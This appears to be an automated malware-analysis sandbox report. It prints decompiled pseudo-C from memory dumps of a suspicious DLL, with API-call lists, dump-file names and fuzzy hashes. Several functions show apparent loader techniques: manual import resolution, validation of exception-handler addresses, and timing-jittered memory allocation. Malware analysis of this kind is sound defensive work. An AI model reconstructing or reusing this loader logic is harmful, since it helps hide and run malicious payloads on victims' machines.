    				void* _t104;
    				long _t108;
    				signed int _t110;
    
    				_t108 = _a4;
    				_t76 =  *(_t108 + 8);
    				if((_t76 & 0x00000003) != 0) {
    					L3:
    					return 0;
    				}
    				_a4 =  *[fs:0x4];
    				_v8 =  *[fs:0x8];
    				if(_t76 < _v8 || _t76 >= _a4) {
    					_t102 =  *(_t108 + 0xc);
    					__eflags = _t102 - 0xffffffff;
    					if(_t102 != 0xffffffff) {
    						_t91 = 0;
    						__eflags = 0;
    						_a4 = 0;
    						_t57 = _t76;
    						do {
    							_t80 =  *_t57;
    							__eflags = _t80 - 0xffffffff;
    							if(_t80 == 0xffffffff) {
    								goto L9;
    							}
    							__eflags = _t80 - _t91;
    							if(_t80 >= _t91) {
    								L20:
    								_t63 = 0;
    								L60:
    								return _t63;
    							}
    							L9:
    							__eflags =  *(_t57 + 4);
    							if( *(_t57 + 4) != 0) {
    								_t12 =  &_a4;
    								 *_t12 = _a4 + 1;
    								__eflags =  *_t12;
    							}
    							_t91 = _t91 + 1;
    							_t57 = _t57 + 0xc;
    							__eflags = _t91 - _t102;
    						} while (_t91 <= _t102);
    						__eflags = _a4;
    						if(_a4 == 0) {
    							L15:
    							_t81 =  *0x6d5041f8;
    							_t110 = _t76 & 0xfffff000;
    							_t58 = 0;
    							__eflags = _t81;
    							if(_t81 <= 0) {
    								L18:
    								_t104 = _t102 | 0xffffffff;
    								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
    								__eflags = _t61;
    								if(_t61 < 0) {
    									_t62 = 0;
    									__eflags = 0;
    								} else {
    									_t62 = _a4;
    								}
    								__eflags = _t62;
    								if(_t62 == 0) {
    									L59:
    									_t63 = _t104;
    									goto L60;
    								} else {
    									__eflags = _v12 - 0x1000000;
    									if(_v12 != 0x1000000) {
    										goto L59;
    									}
    									__eflags = _v16 & 0x000000cc;
    									if((_v16 & 0x000000cc) == 0) {
    										L46:
    										_t63 = 1;
    										 *0x6d504240 = 1;
    										__eflags =  *0x6d504240;
    										if( *0x6d504240 != 0) {
    											goto L60;
    										}
    										_t84 =  *0x6d5041f8;
    										__eflags = _t84;
    										_t93 = _t84;
    										if(_t84 <= 0) {
    											L51:
    											__eflags = _t93;
    											if(_t93 != 0) {
    												L58:
    												 *0x6d504240 = 0;
    												goto L5;
    											}
    											_t77 = 0xf;
    											__eflags = _t84 - _t77;
    											if(_t84 <= _t77) {
    												_t77 = _t84;
    											}
    											_t94 = 0;
    											__eflags = _t77;
    											if(_t77 < 0) {
    												L56:
    												__eflags = _t84 - 0x10;
    												if(_t84 < 0x10) {
    													_t86 = _t84 + 1;
    													__eflags = _t86;
    													 *0x6d5041f8 = _t86;
    												}
    												goto L58;
    											} else {
    												do {
    													_t68 = 0x6d504200 + _t94 * 4;
    													_t94 = _t94 + 1;
    													__eflags = _t94 - _t77;
    													 *_t68 = _t110;
    													_t110 =  *_t68;
    												} while (_t94 <= _t77);
    												goto L56;
    											}
    										}
    										_t69 = 0x6d5041fc + _t84 * 4;
    										while(1) {
    											__eflags =  *_t69 - _t110;
    											if( *_t69 == _t110) {
    												goto L51;
    											}
    											_t93 = _t93 - 1;
    											_t69 = _t69 - 4;
    											__eflags = _t93;
    											if(_t93 > 0) {
    												continue;
    											}
    											goto L51;
    										}
    										goto L51;
    									}
    									_t87 = _v32;
    									__eflags =  *_t87 - 0x5a4d;
    									if( *_t87 != 0x5a4d) {
    										goto L59;
    									}
    									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
    									__eflags =  *_t71 - 0x4550;
    									if( *_t71 != 0x4550) {
    										goto L59;
    									}
    									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
    									if( *((short*)(_t71 + 0x18)) != 0x10b) {
    										goto L59;
    									}
    									_t78 = _t76 - _t87;
    									__eflags =  *((short*)(_t71 + 6));
    									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
    									if( *((short*)(_t71 + 6)) <= 0) {
    										goto L59;
    									}
    									_t72 =  *((intOrPtr*)(_t89 + 0xc));
    									__eflags = _t78 - _t72;
    									if(_t78 < _t72) {
    										goto L46;
    									}
    									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
    									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
    										goto L46;
    									}
    									__eflags =  *(_t89 + 0x27) & 0x00000080;
    									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
    										goto L20;
    									}
    									goto L46;
    								}
    							} else {
    								goto L16;
    							}
    							while(1) {
    								L16:
    								__eflags =  *((intOrPtr*)(0x6d504200 + _t58 * 4)) - _t110;
    								if( *((intOrPtr*)(0x6d504200 + _t58 * 4)) == _t110) {
    									break;
    								}
    								_t58 = _t58 + 1;
    								__eflags = _t58 - _t81;
    								if(_t58 < _t81) {
    									continue;
    								}
    								goto L18;
    							}
    							__eflags = _t58;
    							if(_t58 <= 0) {
    								goto L5;
    							}
    							 *0x6d504240 = 1;
    							__eflags =  *0x6d504240;
    							if( *0x6d504240 != 0) {
    								goto L5;
    							}
    							__eflags =  *((intOrPtr*)(0x6d504200 + _t58 * 4)) - _t110;
    							if( *((intOrPtr*)(0x6d504200 + _t58 * 4)) == _t110) {
    								L32:
    								_t100 = 0;
    								__eflags = _t58;
    								if(_t58 < 0) {
    									L34:
    									 *0x6d504240 = 0;
    									goto L5;
    								} else {
    									goto L33;
    								}
    								do {
    									L33:
    									_t90 = 0x6d504200 + _t100 * 4;
    									_t100 = _t100 + 1;
    									__eflags = _t100 - _t58;
    									 *_t90 = _t110;
    									_t110 =  *_t90;
    								} while (_t100 <= _t58);
    								goto L34;
    							}
    							_t58 = _t81 - 1;
    							__eflags = _t58;
    							if(_t58 < 0) {
    								L28:
    								__eflags = _t81 - 0x10;
    								if(_t81 < 0x10) {
    									_t81 = _t81 + 1;
    									__eflags = _t81;
    									 *0x6d5041f8 = _t81;
    								}
    								_t58 = _t81 - 1;
    								goto L32;
    							} else {
    								goto L25;
    							}
    							while(1) {
    								L25:
    								__eflags =  *((intOrPtr*)(0x6d504200 + _t58 * 4)) - _t110;
    								if( *((intOrPtr*)(0x6d504200 + _t58 * 4)) == _t110) {
    									break;
    								}
    								_t58 = _t58 - 1;
    								__eflags = _t58;
    								if(_t58 >= 0) {
    									continue;
    								}
    								break;
    							}
    							__eflags = _t58;
    							if(__eflags >= 0) {
    								if(__eflags == 0) {
    									goto L34;
    								}
    								goto L32;
    							}
    							goto L28;
    						}
    						_t75 =  *((intOrPtr*)(_t108 - 8));
    						__eflags = _t75 - _v8;
    						if(_t75 < _v8) {
    							goto L20;
    						}
    						__eflags = _t75 - _t108;
    						if(_t75 >= _t108) {
    							goto L20;
    						}
    						goto L15;
    					}
    					L5:
    					_t63 = 1;
    					goto L60;
    				} else {
    					goto L3;
    				}
    			}





































    APIs
    • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6D502536
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.979678689.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000003.00000002.979661998.000000006D500000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.979687462.000000006D503000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.979694688.000000006D505000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.979710009.000000006D506000.00000002.00020000.sdmp
    Similarity
    • API ID: MemoryQueryVirtual
    • String ID: @BPm$@BPm$@BPm
    • API String ID: 2850889275-3677909773
    • Opcode ID: cbed2fd852487a29f10cfd2b393f1944733b3a9ad1c0e1aa1ff911b1823990be
    • Instruction ID: 8f8d27e2bf6710e8673cee77fdf6f32c98b434d462c3da90cf8dc5b8bc2dfff8
    • Opcode Fuzzy Hash: cbed2fd852487a29f10cfd2b393f1944733b3a9ad1c0e1aa1ff911b1823990be
    • Instruction Fuzzy Hash: 2061C9307046039FDB3DCE28D4A076973B5FB9A318F258869D926CBE90EB31D842CA54
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6D50146C() {
    				void* _t1;
    				long _t3;
    				void* _t4;
    				long _t5;
    				void* _t6;
    				intOrPtr _t8;
    
    				_t8 =  *0x6d5041b0;
    				_t1 = CreateEventA(0, 1, 0, 0);
    				 *0x6d5041bc = _t1;
    				if(_t1 == 0) {
    					return GetLastError();
    				}
    				_t3 = GetVersion();
    				if(_t3 <= 5) {
    					_t4 = 0x32;
    					return _t4;
    				} else {
    					 *0x6d5041ac = _t3;
    					_t5 = GetCurrentProcessId();
    					 *0x6d5041a8 = _t5;
    					 *0x6d5041b0 = _t8;
    					_t6 = OpenProcess(0x10047a, 0, _t5);
    					 *0x6d5041a4 = _t6;
    					if(_t6 == 0) {
    						 *0x6d5041a4 =  *0x6d5041a4 | 0xffffffff;
    					}
    					return 0;
    				}
    			}










    APIs
    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6D5017B8,73B763F0,00000000), ref: 6D50147B
    • GetVersion.KERNEL32 ref: 6D50148A
    • GetCurrentProcessId.KERNEL32 ref: 6D501499
    • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6D5014B2
    Memory Dump Source
    • Source File: 00000003.00000002.979678689.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000003.00000002.979661998.000000006D500000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.979687462.000000006D503000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.979694688.000000006D505000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.979710009.000000006D506000.00000002.00020000.sdmp
    Similarity
    • API ID: Process$CreateCurrentEventOpenVersion
    • String ID:
    • API String ID: 845504543-0
    • Opcode ID: d24ac0b9b1123bea2e23bc1123370a0271dbfaddc020d12d5d9ce5fecf18ea8a
    • Instruction ID: e6b53a10f53e76775d0eda7c37c0f8d80a93b3bef8181569658e77aae2356492
    • Opcode Fuzzy Hash: d24ac0b9b1123bea2e23bc1123370a0271dbfaddc020d12d5d9ce5fecf18ea8a
    • Instruction Fuzzy Hash: 03F09A30645311AFFF409F68AC19F823BB0B72EB12F12841EF145C98C0D3B040408B84
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6D501F31(void* __edi, intOrPtr _a4) {
    				signed int _v8;
    				intOrPtr* _v12;
    				_Unknown_base(*)()** _v16;
    				signed int _v20;
    				signed short _v24;
    				struct HINSTANCE__* _v28;
    				intOrPtr _t43;
    				intOrPtr* _t45;
    				intOrPtr _t46;
    				struct HINSTANCE__* _t47;
    				intOrPtr* _t49;
    				intOrPtr _t50;
    				signed short _t51;
    				_Unknown_base(*)()* _t53;
    				CHAR* _t54;
    				_Unknown_base(*)()* _t55;
    				void* _t58;
    				signed int _t59;
    				_Unknown_base(*)()* _t60;
    				intOrPtr _t61;
    				intOrPtr _t65;
    				signed int _t68;
    				void* _t69;
    				CHAR* _t71;
    				signed short* _t73;
    
    				_t69 = __edi;
    				_v20 = _v20 & 0x00000000;
    				_t59 =  *0x6d5041cc;
    				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x1b4cdd98));
    				if(_t43 != 0) {
    					_t45 = _t43 + __edi;
    					_v12 = _t45;
    					_t46 =  *((intOrPtr*)(_t45 + 0xc));
    					if(_t46 != 0) {
    						while(1) {
    							_t71 = _t46 + _t69;
    							_t47 = LoadLibraryA(_t71);
    							_v28 = _t47;
    							if(_t47 == 0) {
    								break;
    							}
    							_v24 = _v24 & 0x00000000;
    							 *_t71 = _t59 - 0x63699bc3;
    							_t49 = _v12;
    							_t61 =  *((intOrPtr*)(_t49 + 0x10));
    							_t50 =  *_t49;
    							if(_t50 != 0) {
    								L6:
    								_t73 = _t50 + _t69;
    								_v16 = _t61 + _t69;
    								while(1) {
    									_t51 =  *_t73;
    									if(_t51 == 0) {
    										break;
    									}
    									if(__eflags < 0) {
    										__eflags = _t51 - _t69;
    										if(_t51 < _t69) {
    											L12:
    											_t21 =  &_v8;
    											 *_t21 = _v8 & 0x00000000;
    											__eflags =  *_t21;
    											_v24 =  *_t73 & 0x0000ffff;
    										} else {
    											_t65 = _a4;
    											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
    											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
    												goto L12;
    											} else {
    												goto L11;
    											}
    										}
    									} else {
    										_t51 = _t51 + _t69;
    										L11:
    										_v8 = _t51;
    									}
    									_t53 = _v8;
    									__eflags = _t53;
    									if(_t53 == 0) {
    										_t54 = _v24 & 0x0000ffff;
    									} else {
    										_t54 = _t53 + 2;
    									}
    									_t55 = GetProcAddress(_v28, _t54);
    									__eflags = _t55;
    									if(__eflags == 0) {
    										_v20 = _t59 - 0x63699b44;
    									} else {
    										_t68 = _v8;
    										__eflags = _t68;
    										if(_t68 != 0) {
    											 *_t68 = _t59 - 0x63699bc3;
    										}
    										 *_v16 = _t55;
    										_t58 = 0x725990f8 + _t59 * 4;
    										_t73 = _t73 + _t58;
    										_t32 =  &_v16;
    										 *_t32 = _v16 + _t58;
    										__eflags =  *_t32;
    										continue;
    									}
    									goto L23;
    								}
    							} else {
    								_t50 = _t61;
    								if(_t61 != 0) {
    									goto L6;
    								}
    							}
    							L23:
    							_v12 = _v12 + 0x14;
    							_t46 =  *((intOrPtr*)(_v12 + 0xc));
    							if(_t46 != 0) {
    								continue;
    							} else {
    							}
    							L26:
    							goto L27;
    						}
    						_t60 = _t59 + 0x9c9664bb;
    						__eflags = _t60;
    						_v20 = _t60;
    						goto L26;
    					}
    				}
    				L27:
    				return _v20;
    			}





























    APIs
    • LoadLibraryA.KERNEL32(?,?,00000000,?,?), ref: 6D501F69
    • GetProcAddress.KERNEL32(?,00000000), ref: 6D501FDB
    Memory Dump Source
    • Source File: 00000003.00000002.979678689.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000003.00000002.979661998.000000006D500000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.979687462.000000006D503000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.979694688.000000006D505000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.979710009.000000006D506000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID:
    • API String ID: 2574300362-0
    • Opcode ID: 523d0a3d99767eee5dfb67e63d2b88d52d720afab7cdf6daf684b4627e12aca9
    • Instruction ID: 4dd5c2f33b1216ef5d7670f53b13f37e6e6d5513c01f1c96828898e212bba974
    • Opcode Fuzzy Hash: 523d0a3d99767eee5dfb67e63d2b88d52d720afab7cdf6daf684b4627e12aca9
    • Instruction Fuzzy Hash: B0313971A00206DFEB18CF59C890BAEB7F8BF49349F14846DD811E7640E770DA40CB62
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: Name::operator+$NameName::$Decorator::getName::operator|=ReturnTypeoperator+
    • String ID: )
    • API String ID: 1186856153-2427484129
    • Opcode ID: 95b9c0c6bca592ac2cc2ce73661b1f262897f743e159b3a289398929614c8b63
    • Instruction ID: 0a46b694307bdde9d70251d1ec3da140f7585d3de15aa9ade43b9ee7ea2fd84f
    • Opcode Fuzzy Hash: 95b9c0c6bca592ac2cc2ce73661b1f262897f743e159b3a289398929614c8b63
    • Instruction Fuzzy Hash: 2FC16271914329AFDF0DCFA8D894EEE7BB4EB45304F02445AE215A7A90FB74AA44CB50
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • DName::operator+.LIBCMT ref: 6D53469F
    • DName::operator+.LIBCMT ref: 6D5347D5
      • Part of subcall function 6D530565: shared_ptr.LIBCMT ref: 6D530581
    • DName::operator+.LIBCMT ref: 6D534821
    • DName::operator+.LIBCMT ref: 6D534830
    • DName::operator+.LIBCMT ref: 6D53478B
      • Part of subcall function 6D535D7E: DName::operator=.LIBVCRUNTIME ref: 6D535E0D
    • DName::operator+.LIBCMT ref: 6D53495D
    • DName::operator=.LIBVCRUNTIME ref: 6D53499D
    • DName::DName.LIBVCRUNTIME ref: 6D5349B5
    • DName::operator+.LIBCMT ref: 6D5349C4
    • DName::operator+.LIBCMT ref: 6D5349D0
      • Part of subcall function 6D535D7E: Replicator::operator[].LIBVCRUNTIME ref: 6D535DBB
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: Name::operator+$Name::operator=$NameName::Replicator::operator[]shared_ptr
    • String ID:
    • API String ID: 1026175760-0
    • Opcode ID: b50c6b22b40f99e4cb8c62ad6b4adbc10181859d390de2fe726db57e0c74b7aa
    • Instruction ID: fbed14f6f2f0e4c33fc141a08a53d55c2028dd7eeda2cc458f26bb3f06c34589
    • Opcode Fuzzy Hash: b50c6b22b40f99e4cb8c62ad6b4adbc10181859d390de2fe726db57e0c74b7aa
    • Instruction Fuzzy Hash: B5C182719043259FDF18CFA8D854BEEBBF4AB4A304F02485EE149A7A80FB759A44CF50
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • ___free_lconv_mon.LIBCMT ref: 6D54CA40
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D295
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D2A7
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D2B9
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D2CB
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D2DD
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D2EF
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D301
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D313
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D325
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D337
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D349
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D35B
      • Part of subcall function 6D54D278: _free.LIBCMT ref: 6D54D36D
    • _free.LIBCMT ref: 6D54CA35
      • Part of subcall function 6D545D93: HeapFree.KERNEL32(00000000,00000000,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1,?), ref: 6D545DA9
      • Part of subcall function 6D545D93: GetLastError.KERNEL32(?,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1,?), ref: 6D545DBB
    • _free.LIBCMT ref: 6D54CA57
    • _free.LIBCMT ref: 6D54CA6C
    • _free.LIBCMT ref: 6D54CA77
    • _free.LIBCMT ref: 6D54CA99
    • _free.LIBCMT ref: 6D54CAAC
    • _free.LIBCMT ref: 6D54CABA
    • _free.LIBCMT ref: 6D54CAC5
    • _free.LIBCMT ref: 6D54CAFD
    • _free.LIBCMT ref: 6D54CB04
    • _free.LIBCMT ref: 6D54CB21
    • _free.LIBCMT ref: 6D54CB39
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
    • String ID:
    • API String ID: 161543041-0
    • Opcode ID: 8039dcae9693818dd6c828f4c140f81013b177681e622510f3e7a09b8f8e7157
    • Instruction ID: 21733c97084e518ad1d6756651efea1ee20c4a6a157641ffac36630447c3304e
    • Opcode Fuzzy Hash: 8039dcae9693818dd6c828f4c140f81013b177681e622510f3e7a09b8f8e7157
    • Instruction Fuzzy Hash: C13173316083429FEB299B79D844B7673E9EF80314F11C829E16AD7960DF30EE54DB12
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • IsInExceptionSpec.LIBVCRUNTIME ref: 6D52EFB6
    • type_info::operator==.LIBVCRUNTIME ref: 6D52EFDD
    • ___TypeMatch.LIBVCRUNTIME ref: 6D52F0E9
    • CatchIt.LIBVCRUNTIME ref: 6D52F13E
    • IsInExceptionSpec.LIBVCRUNTIME ref: 6D52F1C4
    • _UnwindNestedFrames.LIBCMT ref: 6D52F24B
    • CallUnexpected.LIBVCRUNTIME ref: 6D52F266
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
    • String ID: csm$csm$csm
    • API String ID: 4234981820-393685449
    • Opcode ID: f003bcf2b9f4bbc4589dc17fa03a8a48823bed9022b69609dc640a5abcbdd98c
    • Instruction ID: 55562c284af35b0015f2ab6a8fbda90b183cf6e7820b804b356f5a47f8800f2f
    • Opcode Fuzzy Hash: f003bcf2b9f4bbc4589dc17fa03a8a48823bed9022b69609dc640a5abcbdd98c
    • Instruction Fuzzy Hash: 7EC1D031C0420AEFCF0DCFA6E8819AEBBB5BF44314F51455AE811ABA81D731DA59CF91
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • DName::operator+.LIBCMT ref: 6D5351F2
    • UnDecorator::getSignedDimension.LIBCMT ref: 6D5351FD
    • DName::DName.LIBVCRUNTIME ref: 6D53520E
    • UnDecorator::getSignedDimension.LIBCMT ref: 6D5352B3
    • UnDecorator::getSignedDimension.LIBCMT ref: 6D5352D0
    • UnDecorator::getSignedDimension.LIBCMT ref: 6D5352ED
    • DName::operator+.LIBCMT ref: 6D535302
    • UnDecorator::getSignedDimension.LIBCMT ref: 6D535325
    • swprintf.LIBCMT ref: 6D535396
    • DName::operator+.LIBCMT ref: 6D5353ED
      • Part of subcall function 6D53327D: DName::DName.LIBVCRUNTIME ref: 6D5332A1
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: Decorator::getDimensionSigned$Name::operator+$NameName::$swprintf
    • String ID:
    • API String ID: 3689813335-0
    • Opcode ID: 1d2282f7a806f64287548f30fa6f9cdcc2452110c02c403de21b20ce656e0d10
    • Instruction ID: 2696ec891d1958cc526c276b4bf5b37881bf817fcf48c6143c4ee3d5e2e1aac9
    • Opcode Fuzzy Hash: 1d2282f7a806f64287548f30fa6f9cdcc2452110c02c403de21b20ce656e0d10
    • Instruction Fuzzy Hash: D781F572D5432A9AEF0DCBA4C845BFE7778AF46305F53541AD210A3C80FB789A04CBA1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 80%
    			E6D5017A7(intOrPtr _a4) {
    				char _v28;
    				struct _SYSTEMTIME _v44;
    				char _v48;
    				long _v52;
    				long _v56;
    				void* __edi;
    				long _t21;
    				int _t23;
    				long _t27;
    				long _t31;
    				intOrPtr _t39;
    				intOrPtr _t44;
    				signed int _t45;
    				void* _t50;
    				signed int _t54;
    				void* _t56;
    				intOrPtr* _t57;
    
    				_t21 = E6D50146C();
    				_v52 = _t21;
    				if(_t21 != 0) {
    					L18:
    					return _t21;
    				} else {
    					goto L1;
    				}
    				do {
    					L1:
    					GetSystemTime( &_v44);
    					_t23 = SwitchToThread();
    					asm("cdq");
    					_t45 = 9;
    					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
    					_v56 = E6D5015A3(0, _t54);
    					Sleep(_t54 << 5);
    					_t21 = _v56;
    				} while (_t21 == 0xc);
    				if(_t21 != 0) {
    					goto L18;
    				}
    				_t27 = E6D501C12(_t45);
    				_v52 = _t27;
    				if(_t27 != 0) {
    					L16:
    					_t21 = _v52;
    					if(_t21 == 0xffffffff) {
    						_t21 = GetLastError();
    					}
    					goto L18;
    				}
    				if(_a4 != 0) {
    					L11:
    					_push(0);
    					_t56 = E6D501CA4(E6D5016EC,  &_v28);
    					if(_t56 == 0) {
    						_v56 = GetLastError();
    					} else {
    						_t31 = WaitForSingleObject(_t56, 0xffffffff);
    						_v56 = _t31;
    						if(_t31 == 0) {
    							GetExitCodeThread(_t56,  &_v56);
    						}
    						CloseHandle(_t56);
    					}
    					goto L16;
    				}
    				if(E6D501D7C(_t45,  &_v48) != 0) {
    					 *0x6d5041b8 = 0;
    					goto L11;
    				}
    				_t44 = _v48;
    				_t57 = __imp__GetLongPathNameW;
    				_t50 =  *_t57(_t44, 0, 0);
    				if(_t50 == 0) {
    					L9:
    					 *0x6d5041b8 = _t44;
    					goto L11;
    				}
    				_t15 = _t50 + 2; // 0x2
    				_t39 = E6D501C8F(_t50 + _t15);
    				 *0x6d5041b8 = _t39;
    				if(_t39 == 0) {
    					goto L9;
    				} else {
    					 *_t57(_t44, _t39, _t50);
    					E6D50136A(_t44);
    					goto L11;
    				}
    			}

    APIs
      • Part of subcall function 6D50146C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6D5017B8,73B763F0,00000000), ref: 6D50147B
      • Part of subcall function 6D50146C: GetVersion.KERNEL32 ref: 6D50148A
      • Part of subcall function 6D50146C: GetCurrentProcessId.KERNEL32 ref: 6D501499
      • Part of subcall function 6D50146C: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6D5014B2
    • GetSystemTime.KERNEL32(?,73B763F0,00000000), ref: 6D5017CB
    • SwitchToThread.KERNEL32 ref: 6D5017D1
      • Part of subcall function 6D5015A3: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,00000000,00000000), ref: 6D5015F9
      • Part of subcall function 6D5015A3: memcpy.NTDLL(?,?,00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,?,6D5017EC), ref: 6D50168B
      • Part of subcall function 6D5015A3: VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,00000000), ref: 6D5016A6
    • Sleep.KERNEL32(00000000,00000000), ref: 6D5017F4
    • GetLongPathNameW.KERNEL32 ref: 6D50183C
    • GetLongPathNameW.KERNEL32 ref: 6D50185A
    • WaitForSingleObject.KERNEL32(00000000,000000FF,6D5016EC,?,00000000), ref: 6D50188C
    • GetExitCodeThread.KERNEL32(00000000,?), ref: 6D5018A0
    • CloseHandle.KERNEL32(00000000), ref: 6D5018A7
    • GetLastError.KERNEL32(6D5016EC,?,00000000), ref: 6D5018AF
    • GetLastError.KERNEL32 ref: 6D5018C2
    Memory Dump Source
    • Source File: 00000003.00000002.979678689.000000006D501000.00000020.00020000.sdmp, Offset: 6D500000, based on PE: true
    • Associated: 00000003.00000002.979661998.000000006D500000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.979687462.000000006D503000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.979694688.000000006D505000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.979710009.000000006D506000.00000002.00020000.sdmp
    Similarity
    • API ID: ErrorLastLongNamePathProcessThreadVirtual$AllocCloseCodeCreateCurrentEventExitFreeHandleObjectOpenSingleSleepSwitchSystemTimeVersionWaitmemcpy
    • String ID:
    • API String ID: 2280543912-0
    • Opcode ID: 878600212151b24b2e937eaf7151ffc2e9081d882827c2898f56ca57d94135e4
    • Instruction ID: a90ba468fa551f13a5fb4f3c1d8de73baff73fd19cb43b3aefe5f46c5ff6a1ca
    • Opcode Fuzzy Hash: 878600212151b24b2e937eaf7151ffc2e9081d882827c2898f56ca57d94135e4
    • Instruction Fuzzy Hash: 5E3181718097129BEB14DF658884E6B77FCFFC6759B164E2AF564D2940E730CA008BA3
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • _free.LIBCMT ref: 6D54333D
      • Part of subcall function 6D545D93: HeapFree.KERNEL32(00000000,00000000,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1,?), ref: 6D545DA9
      • Part of subcall function 6D545D93: GetLastError.KERNEL32(?,?,6D538848,?,?,?,6D52E166,?,?,?,6D529FF1,?), ref: 6D545DBB
    • _free.LIBCMT ref: 6D543349
    • _free.LIBCMT ref: 6D543354
    • _free.LIBCMT ref: 6D54335F
    • _free.LIBCMT ref: 6D54336A
    • _free.LIBCMT ref: 6D543375
    • _free.LIBCMT ref: 6D543380
    • _free.LIBCMT ref: 6D54338B
    • _free.LIBCMT ref: 6D543396
    • _free.LIBCMT ref: 6D5433A4
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 0159f860ccebc049c4f6d727cdc37a844c96bea9f15a99d3fdaae25fade470ac
    • Instruction ID: a2543751cda50278a5c475b45aa46b3a1f3ea1b69e52c9f9049b6b34d34669f3
    • Opcode Fuzzy Hash: 0159f860ccebc049c4f6d727cdc37a844c96bea9f15a99d3fdaae25fade470ac
    • Instruction Fuzzy Hash: 8D21B676908108BFCB45DF94C884DEE7BB9AF48344F0185A6E6169B530EB71EB44DB81
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.979745369.000000006D50F000.00000020.00020000.sdmp, Offset: 6D50F000, based on PE: false
    Similarity
    • API ID: __aulldvrm
    • String ID: :$f$f$f$p$p$p
    • API String ID: 1302938615-1434680307
    • Opcode ID: b5438043afe30b06477190cf8c945b05878d2e90a1c38a98da154d21764c978b
    • Instruction ID: 42a05122d70d77dc55051bbde9d8cb4f87b0f4742a657b8a175e59242a351e66
    • Opcode Fuzzy Hash: b5438043afe30b06477190cf8c945b05878d2e90a1c38a98da154d21764c978b
    • Instruction Fuzzy Hash: FC026075A042298AEB38CFA5C8546DDB7B6FF42B14FA0C655D428FBA84D7708D84CB13
    Uniqueness

    Uniqueness Score: -1.00%

